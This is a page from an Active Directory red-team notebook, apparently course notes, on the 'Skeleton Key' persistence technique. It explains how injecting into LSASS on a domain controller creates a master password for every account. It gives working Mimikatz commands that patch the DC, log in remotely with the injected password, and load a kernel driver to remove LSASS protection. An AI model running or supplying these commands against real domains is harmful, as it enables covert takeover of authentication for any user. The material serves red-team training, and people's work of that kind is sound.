🖌️
AD-RED-TEAM
  • Active Directory Red Team
  • PowerShell Basics
    • Tips And Tricks
  • I. Active Directory Enumeration
    • User Hunting Domain Enumeration
    • Forest and Domains
    • User Enumeration
    • Groups Enumeration
    • Computers/Server Enumeration
    • Shares Enumeration
    • GP And OU Enumeration
    • ACL Domain Enumeration
    • Trust Domain Enumeration
  • II. Local Privilege Escalation
    • Lateral Movement
    • PowerUp Exploits
  • III. Domain Privilege Escalation
    • Forest Persistence – DCShadow
    • Trust Abuse - MSSQL Servers
    • Priv Esc – Across Forest using krbtgt Ticket
    • Priv Esc - Across Trusts using Trust Tickets
    • Priv Esc – DNSAdmins
    • Priv Esc - Constrained Delegation
    • Priv Esc – Unconstrained Delegation
    • Priv Esc - Targeted Kerberoasting - Set SPN
    • Targeted Kerberoasting - AS-REPs
    • Priv Esc - Kerberoast
  • IV. Domain Persistence and Dominance
    • Persistence ACLs - Security Descriptors
    • Persistence ACLs- Rights Abuse
    • Persistence ACL - AdminSDHolder
    • Persistence – Custom SSP
    • Persistence - DSRM
    • Persistence - Skeleton Key
    • Persistence - Silver Ticket
    • Persistence - Golden Ticket
  • V. Cross Trust Attacks
  • VI. Forest Persistence and Dominance
  • VII. Defenses – Monitoring
  • VIII. Defenses and bypass – Architecture and Work Culture Changes
  • IX. Defenses and Bypass – Deception
  • X. Defenses and Bypass – PowerShell
  • New Server
    • Move Lat-AppLocker
    • Move Lat-Invoke-Command
Powered by GitBook
On this page

Was this helpful?

  1. IV. Domain Persistence and Dominance

Persistence - Skeleton Key

This Skeleton Key injects itself into LSASS and creates a master password that will work for any account in the domain. After injecting, the attacker can use the Skeleton Key password configured at the time of deployment to log in as any domain user. Real users will still be able to log in using their original passwords. This authentication bypass applies to all services that use single-factor AD authentication, such as webmail and VPNs, and it also allows an attacker with physical access of the compromised system to gain control over the system by entering the injected password physically.

  • DA privileges required

Skeleton Key

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

#Now, it is possible to access any machine with a valid username 
#and password as "mimikatz"
Enter-PSSession –Computername dcorp-dc –credential dcorp\Administrator

#You can access other machines as well as long as they authenticate with
#the DC which has been patched and the DC is not rebooted.



--------------------------
#In case lsass is running as a protected process, we can still use Skeleton
#Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC:

mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

#Note that above would be very noisy in logs - Service installation (Kernel
mode driver)
PreviousPersistence - DSRMNextPersistence - Silver Ticket

Last updated 4 years ago

Was this helpful?